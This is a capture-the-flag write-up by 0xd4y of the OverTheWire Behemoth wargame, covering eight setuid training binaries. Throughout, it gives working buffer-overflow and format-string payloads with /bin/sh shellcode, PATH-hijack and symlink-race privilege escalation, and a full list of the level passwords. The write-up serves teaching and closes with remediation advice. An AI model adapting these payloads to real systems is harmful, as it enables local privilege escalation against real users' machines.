Behemoth
A look into the exploitation of vulnerable binaries
0xd4y
April 20, 2021
0xd4y Writeups
LinkedIn: https://www.linkedin.com/in/segev-eliezer/
Email: 0xd4yWriteups@gmail.com
Table of Contents
Discovery of Format String Vulnerability 19
Memory Addresses of Useful Functions 19
Constructing Payload With GDB 20
Catching Behemoth6 Password Through UDP 31
In contrast to Narnia, the source code for each binary is not given. Nevertheless, all eight binaries were successfully analyzed and exploited. Attack techniques such as shellcode injection, format string exploitation, and path privilege escalation are covered in this report. Some binaries were more of a reverse engineering exercise (Behemoth 5 and Behemoth 6 for example) while others typically involved buffer overflow and format string exploits such as in Behemoth 7, a challenge which showcases an interesting way of bypassing shellcode filters.
The binaries were mainly vulnerable due to a lack of boundary checks and input validation. It is critical that the SETUID bits of these binaries are removed until the remedies in the Conclusion section are observed. Below is the full listing of all passwords obtained from the compromised users:
Username | Password |
behemoth0 | behemoth0 |
behemoth1 | aesebootiv |
behemoth2 | eimahquuof |
behemoth3 | nieteidiel |
behemoth4 | ietheishei |
behemoth5 | aizeeshing |
behemoth6 | mayiroeche |
behemoth7 | baquoxuafo |
behemoth8 | pheewij7Ae |
The credentials to the first user, behemoth0, was given as behemoth0 (the credentials are behemoth0:behemoth0). The ssh service is open on port 2221, and this ssh session provided the means for allowing the analysis of the binaries discussed in this report.
Running the strings command on the binary reveals some interesting strings:
However, trying any of these potential passwords results in an “Access denied..” message. Using ltrace, a library call tracer, the system calls of the binary can be seen upon inputting a password:
┌─[✗]─[0xd4y@Writeup]─[~/business/other/overthewire/behemoth/0] |
The binary is comparing the user input to the secret password by using the strcmp (string compare) function. Trying out the eatmyshorts password, we are given access to the next level:
Now with a shell as the behemoth1 user, we can maintain persistence by grabbing the password from /etc/behemoth_pass directory.
Running the behemoth1 binary, the following output can be seen:
After downloading the binary and using ltrace, the following output is found:
┌─[0xd4y@Writeup]─[~/business/other/overthewire/behemoth/1] |
This binary is a little bit more secure in the sense that the password is not exposed by the strcmp function. Before trying to reverse engineer this binary, it is important to check for possible buffer overflow vulnerabilities. This can be done by sending a large input as follows:
┌─[0xd4y@Writeup]─[~/business/other/overthewire/behemoth/1] |
behemoth1@behemoth:/behemoth$ ./behemoth1 |
The program was successfully crashed by sending a large input as can be seen from the “Segmentation fault” error. This is a strong indicator of a potential buffer overflow vulnerability.
┌─[0xd4y@Writeup]─[~/business/other/overthewire/behemoth/1] |
Note how the cyclic function was used to help determine where the offset is
The output confirms the suspicion that this binary is vulnerable to a buffer overflow attack. Looking at the return address at the bottom of the result, it can be seen that the binary is looking for an address of 0x61617361. The offset can be calculated using the cyclic -l operation as follows:
┌─[0xd4y@Writeup]─[~/business/other/overthewire/behemoth/1] |
The offset is the amount of bytes that a binary can take before overwriting the instruction pointer (the register which points to which part of the code should be executed next). Observe from the hex addresses that this is a 32 bit binary. The file command can be used as well to verify this:
┌─[0xd4y@Writeup]─[~/business/other/overthewire/behemoth/1] |
This binary is not stripped meaning the debug symbols[1] of the binary can be gathered. Additionally, the binary’s security can be analyzed with the checksec command:
Seeing as this binary has NX (non-execute) disabed, shellcode can be written into memory and the binary will execute it (provided that the payload is formatted correctly). With the knowledge that arbitrary code can be executed and that the instruction pointer can be controlled, the binary can be exploited by using shellcode.
pwndbg> r < <(python -c "print 'A'*71+'B'*4") |
Note how the return address was successfully controlled (42 is the hex value for B).
For the sake of learning more about binary exploitation, I will go over two different methods of pwning:
We can create a payload that has the following structure:
JUNK_BYTES + ADDRESS_TO_SHELLCODE_ + NOP_SLED + SHELLCODE
Then this payload can be inputted to the binary and it will execute the shellcode. There are many different kinds of shellcodes that can be used, however a simple /bin/sh shellcode[2], which will return a shell upon execution. The next task is to determine where the address of the shellcode will be.
pwndbg> r < <(python -c "print 'A'*71+'B'*4+'C'*23") |
Note A is 41, B is 42, and C is 43 in hex
Looking at the output of the esp register, the register responsible for pointing to the top of the stack, observe that the shellcode (in this case 43) will start at the second column of 0xffffd03c. Thus the address of the shellcode will be 0xffffd03c + 4 (each column corresponds to 4 bytes) which equals 0xffffd040.
With the knowledge of how buffer overflow attacks work, we can now continue with exploiting the behemoth binary on the target system.
(gdb) disass main
Breakpoint 1, 0x08048462 in main ()
(gdb) s Single stepping until exit from function main, which has no line number information. Password: Authentication failure. Sorry. 0xffffd5c0 in ?? () |
Now that the binary’s memory has been flooded, the ESP register can be checked to see which address marks the start of the shellcode:
(gdb) x/100x $esp-100 0xffffd55c: 0x00000000 0x00000001 0xf7fc5000 0xffffd5b8 0xffffd56c: 0x08048474 0x0804850c 0x41414154 0x41414141 0xffffd57c: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd58c: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd59c: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd5ac: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd5bc: 0xffffd5c0 0x90909090 0x90909090 0x90909090 0xffffd5cc: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd5dc: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd5ec: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd5fc: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd60c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd61c: 0x90909090 0x90909090 0x6850c031 0x68732f2f 0xffffd62c: 0x69622f68 0x50e3896e 0xb0e18953 0x0080cd0b 0xffffd63c: 0x08048480 0x080484e0 0xf7fe9070 0xffffd64c 0xffffd64c: 0xf7ffd920 0x00000001 0xffffd7a5 0x00000000 |
The value for the eip register can be found at 0xffffd5bc. It is then followed by a sequence of NOPs. The shellcode is most likely the one at 0xffffd61c + 8. Thus, the return address will most likely work if given a value between 0xffffd5bc + 4 and 0xffffd61c + 8.
behemoth1@behemoth:~$ python -c "print 'A'*71 +'\xd0\xd5\xff\xff'+'\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"|/behemoth/behemoth1 |
It is imperative to note that upon piping this malicious payload into the binary, we did not receive a Segmentation Fault error, rather an Illegal Instruction error was printed out. This error is present whenever a program jumps to an address with code that cannot be interpreted either because it is plain data or is an ambiguous part of an opcode (that’s why this error is also called an illegal opcode error). This is an indication that our payload most likely works, however the return address needs to be tweaked so as to point to an address in memory that will correctly interpret our shellcode. After tweaking with the address for a bit by slightly decrementing it, the following is found:
behemoth1@behemoth:~$ python -c "print 'A'*71 +'\xbb\xd5\xff\xff'+'\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"|/behemoth/behemoth1 |
Note how now there is no error displayed
The program is most likely executing the shellcode, but a shell was not received. This is most likely due to the stdin and stdout being tied to this process. By appending ;cat - to the end of the command to output stdin, the exploit works as intended:
behemoth1@behemoth:~$ (python -c "print 'A'*71 +'\xbb\xd5\xff\xff'+'\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'";cat -)|/behemoth/behemoth1 |
Alternatively, it is possible to exploit this binary by using environment variables.
behemoth1@behemoth:/tmp/dfghoifdghfoidghiodfh$ export EGG=$(python -c 'print "\x90\x90\x90\x90\x90\x90\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x6 |
We can create a c file which will take our environment variable to use for the targeted binary.
#include <stdio.h> |
After compiling the program with gcc, the program can be executed so as to inject the shellcode into the environment variable, and find where it is located in memory:
behemoth1@behemoth:/tmp/dfghoifdghfoidghiodfh$ gcc -m32 find_addr.c -o find_addr behemoth1@behemoth:/tmp/dfghoifdghfoidghiodfh$ ./find_addr EGG /behemoth/behemoth1 |
Seeing that the shellcode is at 0xffffddd3,the payload can be constructed to point to this address:
behemoth1@behemoth:/tmp/dfghoifdghfoidghiodfh$ (python -c "print 'A'*71+'\xd3\xdd\xff\xff'";cat -)|/behemoth/behemoth1 |
As the behemoth2 user, the behemoth2 binary can now be executed.
After executing the binary, the program simply touches a file and then hangs:
behemoth2@behemoth:/behemoth$ ./behemoth2 |
Seeing as this binary performs a system function, there is most likely a system function being called within the program.
After downloading the binary onto the attack box, this binary can be further analyzed within Ghidra:
undefined4 main(void) |
Toward the top of the program, the sprintf function is called in which the string “touch %d” is passed into the local_2c variable (with %d corresponding to the id of this process). It is essential to note that touch is declared without using its full path (i.e. /usr/bin/touch).
Furthermore, two system calls are executed. One is within the if statement and one is outside the if statement following a sleep of 2000 seconds. This sleep call is responsible for the hanging that was experienced after executing the binary. Therefore, the first system call is to the touch command. The second system call again uses the local_2c variable, but only after it is initialized to 0x20746163. Converting 20 74 61 63 into ascii results in “ tac”.
behemoth2@behemoth:/behemoth$ file behemoth2 |
Seeing as this binary is in LSB format, the “ tac” string should actually be read backwards, revealing that this is “cat “. Thus, the program first touches the a file then cats it after 2000 seconds.
This binary has multiple vulnerabilities, and each method of exploitation is described below:
Seeing as this binary executes the touch command without using its full path, a file called touch can be created which executes the /bin/bash command:
behemoth2@behemoth:/tmp/pathprivesc$ echo “/bin/bash” > touch |
After creating this file with the aforementioned contents, the PATH environment variable can be updated to prioritize the current directory over all other directories:
behemoth2@behemoth:/tmp/pathprivesc$ export PATH=.:$PATH |
Now, upon executing the behemoth2 binary, the touch command will be called to the newly created touch file:
behemoth2@behemoth:/tmp/pathprivesc$ /behemoth/behemoth2 |
The same methodology used for the touch command can be used for the cat command. As seen from the analysis, the cat command is also being called without using its full path:
behemoth2@behemoth:/tmp/pathprivesc$ echo “/bin/bash” > cat behemoth3 |
This way of escalating privileges takes longer than the aforementioned one because a wait of 2000 seconds is necessary before cat gets executed.
This binary could still be abused even if the cat and touch commands were executed using their full paths. A symbolic link to the behemoth3 password file can be created so that the cat command reads the password of the behemoth3 user. The name of the file must correspond to the id of the process. When the cat command reads the contents of the created file, it will be pointed to the credentials of behemoth3, and the password of the user would be printed to stdout:
behemoth2@behemoth:/tmp/behemoth2$ /behemoth/behemoth2 |
Once the behemoth2 binary was executed, an error occurred stating that the file 10216 was attempted to be created, but the behemoth3 user does not have the permissions to create this file under a directory owned by behemoth2. The name of the file is leaked, meaning that a symbolic link named after this file can be created before the cat command gets executed (the time limit for creating this file is 2000 seconds).
After logging into another session as the behemoth2 user, a symbolic link corresponding to 10216 can be created:
behemoth2@behemoth:/tmp/behemoth2$ ln -s /etc/behemoth_pass/behemoth3 10216 |
Note that this file is pointing to the password of the behemoth3 user.
After waiting for 2000 seconds, the password of the behemoth3 user gets printed out:
behemoth2@behemoth:/tmp/behemoth2$ /behemoth/behemoth2 |
After successfully abusing the behemoth2 binary, the next challenge is behemoth3.
We can begin the analysis by downloading the target binary on the attack box and running the checksec command against it:
┌─[0xd4y@Writeup]─[~/business/other/overthewire/behemoth/3] |
From the results of checksec and file, note that the binary essentially has no protection on it. Everything that could possibly hinder debug analysis on the program is disabled. Additionally, the file is not stripped, so debug symbols will be available.
When executing the program, we are asked to provide an identification:
behemoth3@behemoth:/behemoth$ ./behemoth3 |
After inputting a large amount of A’s (in this example 500 A’s were used), the program prints out a minimized version of the string:
behemoth3@behemoth:/behemoth$ ./behemoth3 |
Despite 500 A’s being passed into the buffer, only 200 A’s were printed out. Ghidra can be implemented to further help in understanding how this binary is working:
Ghidra translated the assembly code of the main function into the following:
undefined4 main(void) |
A variable called local_cc of type char is declared and is allocated 200 bytes. Afterwards, the fgets function is used to allow up to 200 bytes to be passed to the local_cc variable, and therefore this binary is not vulnerable to a buffer overflow exploit. However, the user input (local_cc) is passed directly to the printf function without any sort of sanitization. Consequently, the program is likely vulnerable to a string format exploit[3].
This can be verified by passing a format string into the local_cc variable:
behemoth3@behemoth:/behemoth$ ./behemoth3 |
Despite inputting %x into the buffer, an output of a7825 was printed (note that %x is a format string to specify an unsigned int as a hexadecimal number[4]). When the binary is given a format string as an input, it starts to leak memory from the stack.
This vulnerability can be abused to overwrite memory by using the %n format string which writes the number of characters written into a pointer parameter. If the pointer parameter is an address that the binary uses, then the memory address of the function can be overwritten to point to shellcode. This can result in the execution of arbitrary code.
The objdump command can be utilized to determine the addresses of functions used by the binary:
behemoth3@behemoth:/behemoth$ objdump -R ./behemoth3 |
From the output, there are a total of three functions displayed (printf, fgets, and puts). However, the fgets and printf functions should not be overwritten, as these functions must work properly to accept the malicious payload. This leaves the puts function as the only candidate from the objdump output to be overwritten.
Before being able to overwrite the memory address of puts, the user input’s location within the stack must first be determined:
behemoth3@behemoth:/behemoth$ ./behemoth3 |
When inputting AAAA followed by a %x format string, the hexadecimal values of the A’s are immediately printed. This means that the user input is in the first parameter within the stack. Throughout this level, the malicious input will be directed to a file so that the payload can be constructed with the help of GDB:
Using the address of puts found by the objdump command, the following payload can be constructed:
behemoth3@behemoth:/tmp/overwrite_puts$ python -c "print '\xac\x97\x04\x08'+'%100x%n'" > overwrite |
The \xac\x97\x04\x08 string corresponds to the address of the puts function in little endian form (0x080497ac). Following this, the hex output of this string is printed out with a padding of 100 0’s. This type of padding is extremely useful for controlling the value of the memory address of whatever is being overwritten.
When this payload is inputted into the binary within GDB, a segmentation fault occurs, however the address of the puts function does not follow an expected value:
(gdb) r < overwrite |
Observe that the address is x08048356 instead of a low value. To be exact, the value should be equal to the number of characters that are in the payload. This would mean that the value should be 4 (for the address of puts) + 100 (hex formatter) which is 104 in decimal and 0x68 in hex. Prepending AAAA to the beginning of the payload successfully overwrites the puts function:
behemoth3@behemoth:/tmp/overwrite_puts$ python -c "print 'AAAA\xac\x97\x04\x08' + '%100x%n'" > overwrite (gdb) x/x 0x080497ac 0x80497ac: 0x0000006c |
Note that the puts function points to 0x6c which is 108 in decimal (this change from 104 is a result of prepending 4 A’s)
With the successful overwrite of the puts function, the next step is to control the address that it points to. Currently, it points to 0x6c, but this value must be changed to point to shellcode in order for the successful execution of arbitrary code. The particular methodology used to develop this exploit will work on the basis of overwriting the puts function address two bytes at a time. Thus, the final exploit will look like the following:
‘AAAA’ + ‘\xac\x97\x04\x08’ + ‘AAAA’ + ‘\xae\x97\x04\x08’ + NOP_SLED + SHELLCODE + FORMAT_STRINGS_TO_CONTROL_PUTS_ADDRESS
Note that there are two addresses within this payload: one is the base address of the puts function, and the other is the puts address + 2 to accommodate for overwriting the address two bytes at a time. This will also mean that two %x strings must be used along with two %n’s. Additionally, a shellcode[5] of 23 bytes will be used.
To begin the exploit, the puts address must first be controlled with the help of format string padding.
behemoth3@behemoth:/tmp/overwrite_puts$ python -c "print 'AAAA' + '\xac\x97\x04\x08' + 'AAAA' + '\xae\x97\x04\x08' + '\x90'*100 + 'S'*23 + '%100x%n'" > exploit |
A NOP sled of 100 bytes is used before the shellcode of 23 bytes (denoted by the placeholder ‘S’) is declared. Following the shellcode is a padding of 100 bytes to the hex format specifier which results in the puts address of 0xef when executed:
(gdb) r < exploit |
A segmentation fault occurred as expected, because the puts address points to a memory address that it cannot access. Ideally, the puts function should point to an address somewhere within the nop sled. Seeing as the nop sled consists of 100 bytes, there are multiple addresses that would work for this exploit:
(gdb) x/40x $esp |
The exploit begins at address 0xffffd4d8 + 8 (as can be seen from 0x41414141 which is AAAA) followed by the address of puts and another string of four A’s. This is then followed by puts + 2, and finally the nop sled begins at 0xffffd4e8 + 8. For the purposes of this exploit, a memory address of 0xffffd518 was chosen. Note how this value in decimal is 4294956312 which theoretically could be obtained by passing in an exploit that is about 4294956312 bytes long. In reality, however, this would cause a memory overload (and even if it didn't, printing this many bytes to stdout would take a long time). As mentioned in Exploit Development, this can be bypassed by passing two %n format specifiers which point to two different points in memory whose addresses are two bytes apart.
The largest value for each part of the memory address when split into two is 16^4 - 1 which is 65535. This largely reduces the 4294956312 length previously mentioned. Incidentally, the largest value possible for a 32 bit binary is 16^8 - 1 which is 4294967295 or 0xffffffff.
A value of 0xef was written to the puts function address; however, a value of 0xd510 (for the lower two bytes) was desired. The padding necessary for achieving this value can be determined through the following calculation:
desired_output - current_output + current_padding
(gdb) p 0xd510 - 0xef + 100 |
Thus, a padding of 54405 is needed to output 0xd510:
(gdb) r < exploit |
The lower two bytes were successfully overwritten to 0xd510. The same method can be used to overwrite the two most significant bytes:
behemoth3@behemoth:/tmp/overwrite_puts$ python -c "print 'AAAA' + '\xac\x97\x04\x08' + 'AAAA' + '\xae\x97\x04\x08' + '\x90'*100 + 'S'*23 + '%54405x%n%100x%n'" > exploit |
Note that a padding of 100 was arbitrarily picked so as to perform the following calculations:
After inputting a padding of 100 bytes for the two most significant bytes, the subsequent value was determined to be 0xd574:
(gdb) r < exploit |
The correct padding can subsequently be calculated:
(gdb) p 0xffff - 0xd574 + 100 |
Therefore, the final exploit will look like the following:
python -c "print 'AAAA' + '\xac\x97\x04\x08' + 'AAAA' + '\xae\x97\x04\x08' + '\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x |
Note that the S was also changed to the actual shellcode. Executing this payload within GDB causes the debug process to abruptly exit due to the execution of /bin/dash:
(gdb) r < exploit |
When this payload is piped straight into the binary without GDB, a shell is returned:
behemoth3@behemoth:/tmp/overwrite_puts$ (python -c "print 'AAAA' + '\xac\x97\x04\x08' |
Note that cat - is appended to the end of the payload. This is an essential part of the exploit which allows the process to interact between stdin and stdout. Without cat, the process immediately exits without errors.
Incidentally, when first performing the exploit of this binary, a /bin/bash shellcode[6] was used, however it did not work outside GDB for unknown reasons. When a binary exploitation does not work as intended, it could be beneficial to use a different shellcode to see if it resolves the problem.
With the necessary permissions obtained by compromising the behemoth4 user, the behemoth4 binary can be executed.
Before being able to exploit the binary, it is necessary to understand how it works first.
Executing the binary does not result in anything out of the ordinary:
behemoth4@behemoth:/tmp$ /behemoth/behemoth4 |
The program simply prints out “PID not found!” and exits immediately.
Within Ghidra, we can get a further look at how the program is getting the PID, and what it does with it:
undefined4 main(void) |
The program starts by declaring a couple of variables. The getpid function is called, and local_14 is set to equal its output. This output is then concatenated with /tmp, and local_30 is set to equal it. Afterwards, the local_18 variable is set to equal the output when opening a file in /tmp whose name corresponds to the id of the binary’s process (which is local_30). If the file does not exist, then “PID not found!” is printed out. Otherwise, the contents of the file is read out by using the getchar function within a while loop.
The problem with this program is that it assumes that it can only read files within the /tmp directory. However, symbolic links can be used to make the program read the password file of the behemoth5 user.
Seeing as the pid of the binary cannot be easily determined before executing the program, a bash script can be utilized to create many files that correspond to possible PIDs. Before creating this bash script, the approximate PID of the binary must first be found:
behemoth4@behemoth:/tmp$ ltrace /behemoth/behemoth4 |
This process was assigned to the ID of 22928, and it therefore looked for a file called 22928 within the /tmp directory. The PID upon the next execution of the binary must be greater than 22928 but likely less than 30000:
behemoth4@behemoth:/tmp$ for i in {22928..30000}; do ln -s /etc/behemoth_pass/behemoth5 $i;done |
Now, when the binary is executed, it will read the contents of behemoth5’s password:
behemoth4@behemoth:/tmp$ /behemoth/behemoth4 |
By first logging into the account through ssh with the credentials found in Behemoth 4, the behemoth5 binary can be executed.
When executing the binary, nothing out of the ordinary occurs. The binary simply exits without anything printing out to stdout. After downloading the binary onto the attack box, Ghidra could be utilized to help in analyzing the binary.
void main(void) |
After many different variables are declared, the password for the behemoth6 user is read into the program. Afterwards, the gethostbyaddressname function is called with the argument “localhost”. Shortly afterwards, the socket function is called using the arguments (2,2,0). Observe the following code and the corresponding Ghidra output:
Source1:
Ghidra1:
Source2:
Ghidra2:
Source3:
Ghidra3:
The socket arguments of Ghidra3 are identical to the arguments seen from behemoth5. Therefore, the arguments seen in the behemoth5 binary correspond to iPv4, UDP, and default protocol respectively[7].
Following the calling of the socket function, iVar3 is set to be 1337 before a sendto function is called. From these lines of code, it can be discerned that a UDP socket is opened on port 1337, and the password of the behemoth6 user is sent to it.
Before executing the binary, it is essential that another session be opened so that a UDP listener can be set up on port 1337:
behemoth5@behemoth:~$ nc -lup 1337 localhost |
The -u flag specifies UDP mode, -p is for specifying a port, and -l tells nc to listen for inbound connections
After executing the binary, the password of the behemoth6 user can be seen on stdout:
Note that the blue line is a result of using tmux[8], and it represents the delimiter between different sessions
This challenge was more of a reverse engineering exercise, but it is good practice for developing the skill of understanding the functionality of a binary.
After logging in as the behemoth6 user and executing the behemoth6 binary, the following output is seen:
behemoth6@behemoth:/behemoth$ ./behemoth6 |
Furthermore, performing the ls command on the /behemoth directory reveals another interesting file possibly related to behemoth6:
behemoth6@behemoth:/behemoth$ ls |
Namely, that file is called behmoth6_reader and it might be used by the behemoth6 binary. After downloading the binary onto the attack box, the binary can be analyzed with the help of Ghidra.
Ghidra translated the assembly code found for each binary into the following:
The code on the left was produced by the behemoth6 binary, while the code on the right is from the behemoth_reader. Looking at the code for the bhemeoth6_reader program, a file named shellcode.txt is expected. However, the contents of this file are not printed out anywhere. If a file named shellcode.txt exists, then a small sanitization is performed against the file: if the 0xb byte exists within the file, then the program immediately exits.
In short, the program is executing the contents of the shellcode.txt file as machine code. Therefore, shellcode will get executed by the binary. This, however, will not directly result in a privileged shell due to the fact that the SETUID bit is not enabled on the behemoth6_reader binary. Rather, the behemoth6 binary has the SETUID bit, and its interaction with the behemoth6_reader will determine the significance of the shellcode.
Looking at the code for behemoth6, observe that the file is opened using the popen function in read mode, after which the output is passed into the __stream variable. This variable then gets passed into __s1 which is compared against the string ‘HelloKitty’ in the strcmp function. If the contents of this variable matches the string, then a /bin/sh shell is returned.
The output of the popen function is determined by the behemoth6_reader. Consequently, if the behemoth6_reader executes shellcode that makes it print out ‘HelloKitty’, then a shell will be returned. There are already shellcodes online that perform this operation, and the following shellcode was used[9]:
char code[] = |
The code above prints out whatever string follows it (however the string must be in machine code). This code, coupled with a subsequent string in shellcode will result in a successful.string comparison. To facilitate the conversion between ascii and shellcode, a conversion table[10] was used.
Ascii:
HelloKitty
Shellcode:
\x48\x65\x6c\x6c\x6f\x4b\x69\x74\x74\x79
After creating a directory in /tmp (so as to be able to create files), the following code was printed into shellcode.txt:
behemoth6@behemoth:/tmp/behemoth6$ python -c "print '\xe9\x1e\x00\x00\x00\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0f\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdd\xff\xff\xff' +'\x48\x65\x6c\x6c\x6f\x4b\x69\x74\x74\x79'" > shellcode.txt |
Now when executing the behemoth6 binary, the shellcode file will be called when the behemoth6_reader is executed via the popen function, subsequently making the reader print out HelloKitty. This will cause the strcmp function to run true, and a /bin/sh shell is subsequently returned:
behemoth6@behemoth:/tmp/behemoth6$ /behemoth/behemoth6 |
After successfully exploiting the behemoth6 binary, we are left with the final challenge of exploiting the behemoth7 binary.
Before analysing the binary within tools such as GDB and Ghidra, it is advised to first start by executing the binary to observe its behavior.
Upon executing the binary, nothing conspicuous occurs. The binary immediately exits after execution without printing anything to stdout.
After downloading the binary onto the attack box, the binary can be analyzed with the help of Ghidra. Using Ghidra, the assembly code of the binary was converted to the following code:
undefined4 main(int param_1,int param_2,int param_3) |
At the very top of the code, it can be seen that the main function takes three parameters. These parameters most likely correspond to the input given by argc[11]. At the top of the main function are declarations of variables, and among them is local_210 with 512 bytes allocated to it. Toward the middle of the main function is a while loop located within an if statement. Inside of the while loop is an if statement which, upon running true, prints the following:
fprintf(stderr,"Non-%s chars found in string, possible shellcode!\n","alpha");
Therefore, it is likely there is a filter on non alphanumeric characters[12]. This could limit the possible shellcode that could be used if the EIP register cannot be overwritten. However, looking at the code, there does not seem to be any boundary checks, and the EIP register should capable of being overwritten. This can be verified by inputting a large number of bytes into the program:
behemoth7@behemoth:/behemoth$ gdb -q /behemoth/behemoth7 |
The EIP register was successfully overwritten as can be seen by the value of the instruction pointer (0x41414141), which is AAAA in hex. Therefore, the shellcode that will be used for exploiting this binary does not have to be made of alphanumeric characters.
The payload will consist of the necessary amount of bytes to equal the EIP offset, followed by the address of the shellcode, after which the NOP sled will be declared which precedes the shellcode.
To begin the construction of the exploit, the EIP offset must first be calculated:
pwndbg> r $(cyclic 1000) |
The offset was calculated as 528 bytes, and as such 528 bytes of junk must first be inputted into the binary before the EIP register can be controlled.
The next step is to determine the address of the shellcode[13]. This can easily be analyzed within GDB:
(gdb) r $(python -c "print 'A'*528+'BBBB'+'A'*112+'\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80'") |
Note that the EIP register was successfully controlled to be 0x42424242 (equivalent to BBBB)
The beginning of the shellcode can be found withhin the stack pointer:
(gdb) x/100x $esp-200 |
The junk after the EIP begins at 0xffffd2e8 + 8 which is 0xffffd2f0. Following the junk bytes is the shellcode at 0xffffd358 + 8 which is equivalent to 0xffffd360. Therefore the EIP value should be overwritten to point to f 0xffffd360.
With the knowledge of the EIP offset and the shellcode address, the final payload can now be constructed:
‘A’*528 + ‘\x48\xd3\xff\xff’ + ‘A’*112 + ‘\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80’
It is important to note that the repetition of ‘A’ 112 times was chosen so as to not spill 0x41 into the shellcode portion of memory. This value of 112 is not necessary, but it should be a multiple of 4 to prevent spilling into memory addresses that only shellcode should occupy.
The payload works in GDB as can be seen from /bin/bash being executed:
(gdb) r $(python -c "print 'A'*528+'\x60\xd3\xff\xff'+'A'*112+'\x6a\x0b\x58\x99\x52\x66 |
When trying this payload outside of GDB, a shell is successfully popped, and the final local user is compromised:
behemoth7@behemoth:/behemoth /behemoth/behemoth7 $(python -c "print 'A'*528+'\x60\xd |
Every binary tested was successfully exploited. Many binaries which in practice should not be vulnerable, turned out to be exploitable due to the calling of sensitive system commands (in particular /bin/sh). This resulted in the horizontal privilege escalation in Behemoth 0 and Behemoth 6.
There were multiple different vulnerabilities associated with each binary, running from format string exploits to buffer overflows and privilege escalation via the PATH environment variable.The following remediations should strongly be considered: